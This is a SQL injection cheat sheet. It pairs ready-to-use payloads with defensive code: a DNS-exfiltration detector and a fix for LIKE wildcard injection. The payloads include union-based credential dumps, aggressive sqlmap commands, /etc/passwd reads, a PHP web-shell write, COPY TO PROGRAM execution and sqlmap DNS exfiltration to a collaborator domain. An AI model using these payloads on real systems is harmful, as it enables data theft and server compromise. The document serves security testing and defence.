SQL Injection

Database enumeration

MySQL
  SELECT GROUP_CONCAT(schema_name,',') FROM information_schema.schemata;
  SELECT GROUP_CONCAT(table_name,',') FROM information_schema.tables;
  SELECT GROUP_CONCAT(column_name,',') FROM information_schema.columns WHERE table_name = 'users';

PostgreSQL
  SELECT datname FROM pg_database;
  SELECT string_agg(table_name,',') FROM information_schema.tables;
  SELECT string_agg(column_name,',') FROM information_schema.columns WHERE table_name = 'users';

SQLite
  SELECT GROUP_CONCAT(tbl_name,',') FROM sqlite_master WHERE type='table' AND tbl_name NOT like 'sqlite_%';
  SELECT sql FROM sqlite_master WHERE tbl_name='users';
  SELECT GROUP_CONCAT(name,',') FROM PRAGMA_TABLE_INFO('users');

MSSQL (union-based walkthrough)
- Test: or 1=1-- -
- Identify the number of columns: start at ' order by 1-- - and increase the number until an error or different content appears, e.g. ' order by 7-- -
- Confirm the number of columns: ' union select 1,2,@@VERSION,DB_NAME(),5,6-- -
- Get tables: ' union select 1,2,table_name,4,5,6 FROM INFORMATION_SCHEMA.TABLES-- -
- Get columns from table Users: ' union select 1,2,name,4,5,6 FROM syscolumns WHERE id=(SELECT id FROM sysobjects WHERE name = 'Users')-- -
- Dump data from table Users: ' union select 1,2,username,password,4,5 FROM Users-- -

SQLMAP
- Use a request file: sqlmap -r file.txt --batch --level 5 --risk 3
- POST request: sqlmap -u "https://website/page.php" -X POST --data "action=edit&id=3" --cookie="abcdefg12345" --batch --dump --level 5 --risk 3

Bypass
- Encoding the payload using utf-16 (Python helper that rewrites each character as a \u00XX escape):
  user_input = input('>').strip()
  utf = [f"\\u00{ord(i):02x}" for i in user_input]
  print(''.join(utf))

Error based
- PostgreSQL: ' AND 1=CAST((SELECT username FROM users) AS int)--

File read/write & RCE
- PostgreSQL:
  SELECT pg_ls_dir('.');
  SELECT pg_read_file('/etc/passwd');
  COPY (SELECT '') TO PROGRAM 'sleep 5';
- MySQL:
  SELECT LOAD_FILE('/etc/passwd');
  SELECT '<?php system($_REQUEST[c]); ?>' INTO OUTFILE '/var/www/html/shell.php';

Faster Exfiltration via DNS
- https://github.com/PortSwigger/sqlmap-dns-collaborator
- https://arxiv.org/ftp/arxiv/papers/1303/1303.3047.pdf
SqlmapDnsCollaborator is a Burp Extension that lets you perform DNS exfiltration with Sqlmap with zero configuration needed. You won't need a domain name or a public IP, just a computer with Sqlmap and Burp.
How you would normally perform DNS exfiltration with Sqlmap:
- You buy a domain name, a public IP and then you set up a server
- You run Sqlmap on that server, which performs some SQL injection on the vulnerable target.
- Vulnerable target sends DNS requests to your DNS server containing interesting data.
- DNS requests are interpreted by Sqlmap.
How you are going to perform DNS exfiltration with Sqlmap and SqlmapDnsCollaborator:
- You open Burp on your computer and enable SqlmapDnsCollaborator.
- You run Sqlmap on your computer, which performs some SQL injection on the vulnerable target.
- Vulnerable target sends DNS requests to Burp Collaborator containing interesting data.
- SqlmapDnsCollaborator reads DNS requests from Burp Collaborator and sends them to Sqlmap.
- DNS requests are interpreted by Sqlmap.
sqlmap.py -r req.txt --dns-domain=yourcollab.burpcollaborator.net -v3
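The flow above shows the defender-relevant signal: the database server itself resolves many unique, data-carrying subdomains under one zone the receiver controls. The following detection sketch is an added example (not code from this page or from the SqlmapDnsCollaborator project) that runs over a constructed resolver log and flags (client, zone) pairs with many distinct subdomain labels or unusually long labels. The log format, the 16/3 thresholds, the fixed three-label "parent zone" and the hex-looking labels are all assumptions made for the example.

```python
from collections import defaultdict

# Constructed resolver log (not real traffic): "<timestamp> <client-ip> <queried-name>".
SAMPLE_LOG = """\
2024-01-01T10:00:01 10.0.0.5 www.example.com
2024-01-01T10:00:02 10.0.0.5 61646d696e.yourcollab.burpcollaborator.net
2024-01-01T10:00:02 10.0.0.5 70617373776f7264313233.yourcollab.burpcollaborator.net
2024-01-01T10:00:03 10.0.0.7 cdn.static.example.com
2024-01-01T10:00:04 10.0.0.5 7365637265742d746f6b656e.yourcollab.burpcollaborator.net
"""

PARENT_DEPTH = 3  # assumption: the last three labels are the zone the receiver controls


def parse_line(line):
    """Split one constructed log line into (timestamp, client, normalised qname)."""
    ts, client, qname = line.split()
    return ts, client, qname.lower().rstrip(".")


def split_query(qname):
    """Return (data_labels, parent_zone), or None when nothing sits below the parent zone."""
    labels = qname.split(".")
    if len(labels) <= PARENT_DEPTH:
        return None
    return labels[:-PARENT_DEPTH], ".".join(labels[-PARENT_DEPTH:])


def find_exfil_candidates(log_text, min_label_len=16, min_unique=3):
    """Flag (client, zone) pairs whose subdomain labels look like carried data.

    Two heuristics, either of which triggers: many distinct subdomains under the
    same zone from one client, or a single label long enough to be encoded data.
    """
    unique = defaultdict(set)   # (client, zone) -> distinct data labels seen
    longest = defaultdict(int)  # (client, zone) -> longest single label
    for line in log_text.splitlines():
        if not line.strip():
            continue
        _, client, qname = parse_line(line)
        parts = split_query(qname)
        if parts is None:
            continue
        data_labels, zone = parts
        key = (client, zone)
        unique[key].add(".".join(data_labels))
        longest[key] = max(longest[key], max(len(lab) for lab in data_labels))
    hits = []
    for key in unique:
        if len(unique[key]) >= min_unique or longest[key] >= min_label_len:
            hits.append((key[0], key[1], len(unique[key]), longest[key]))
    return sorted(hits)


if __name__ == "__main__":
    for client, zone, count, longest_label in find_exfil_candidates(SAMPLE_LOG):
        print(f"{client} -> {zone}: {count} distinct data labels, longest {longest_label} chars")
```

In the constructed log only the database host 10.0.0.5 is flagged, and only for the collaborator zone; the ordinary `www`/`cdn` lookups fall below both thresholds. In production the fixed three-label zone split should be replaced by a public-suffix lookup, and the thresholds tuned against a baseline of the server's normal outbound DNS (a database server normally makes almost none).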
SQL "LIKE" Wildcard Injection
This vulnerability, often overlooked and considered low risk, can have significant impacts in certain scenarios. It involves injecting a wildcard in the search field of a LIKE clause in a SQL statement.
Types of Wildcards
- % : Equivalent to any string of zero or more characters.
- _ : Equivalent to any single character.
Vulnerability
An application becomes vulnerable when it uses the LIKE operator with a user-received parameter without filtering these wildcards. For example:
SELECT text FROM table WHERE secrets LIKE '$secret'
Even if the $secret parameter is sanitized to prevent SQL injection, wildcards can still be injected:
http://www.vulnerable.com/reset.php?secret=<guessed_chars>_____________
Each "_" is a wildcard that matches one of the still-unknown characters, so the secret can be matched without knowing it in full.
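The following is an added example (not code from this page) that reproduces the reset.php situation above against an in-memory SQLite table and then shows the fix: bind the value as a parameter and neutralise `%` and `_` with an ESCAPE clause, or, for a credential check like this one, drop LIKE in favour of equality. The table name `resets`, the sample secrets and the helper names are constructed for the example.

```python
import sqlite3


def make_db():
    """Constructed demo table: one password-reset secret per user."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE resets (user TEXT, secret TEXT)")
    conn.executemany(
        "INSERT INTO resets VALUES (?, ?)",
        [("alice", "a7f3k9q2"), ("bob", "z1x2c3v4")],
    )
    return conn


def lookup_vulnerable(conn, secret):
    """Quotes are 'sanitized' by doubling, so classic injection fails,
    but LIKE metacharacters pass straight through to the engine."""
    sanitized = secret.replace("'", "''")
    sql = f"SELECT user FROM resets WHERE secret LIKE '{sanitized}' ORDER BY user"
    return [row[0] for row in conn.execute(sql)]


def escape_like(value, esc="\\"):
    """Escape the escape character first, then the two LIKE wildcards."""
    return (value.replace(esc, esc + esc)
                 .replace("%", esc + "%")
                 .replace("_", esc + "_"))


def lookup_hardened(conn, secret):
    """Parameter binding plus ESCAPE: user input can no longer act as a pattern."""
    sql = "SELECT user FROM resets WHERE secret LIKE ? ESCAPE '\\' ORDER BY user"
    return [row[0] for row in conn.execute(sql, (escape_like(secret),))]


def lookup_exact(conn, secret):
    """For a secret/token check, LIKE has no business in the query at all."""
    sql = "SELECT user FROM resets WHERE secret = ? ORDER BY user"
    return [row[0] for row in conn.execute(sql, (secret,))]


if __name__ == "__main__":
    db = make_db()
    probe = "a_______"  # one known char + seven single-char wildcards
    print("vulnerable:", lookup_vulnerable(db, probe))   # matches alice's secret
    print("hardened:  ", lookup_hardened(db, probe))     # no match
    print("exact:     ", lookup_exact(db, "a7f3k9q2"))   # only the real secret matches
```

The vulnerable form confirms a secret one character at a time exactly as the `reset.php?secret=<guessed_chars>_____` URL above does; the hardened form returns nothing for the same probe because every `_` is now a literal underscore. Escaping is still needed on top of parameter binding: a bound parameter stops SQL injection, but the bound string is still interpreted as a LIKE pattern unless its wildcards are escaped.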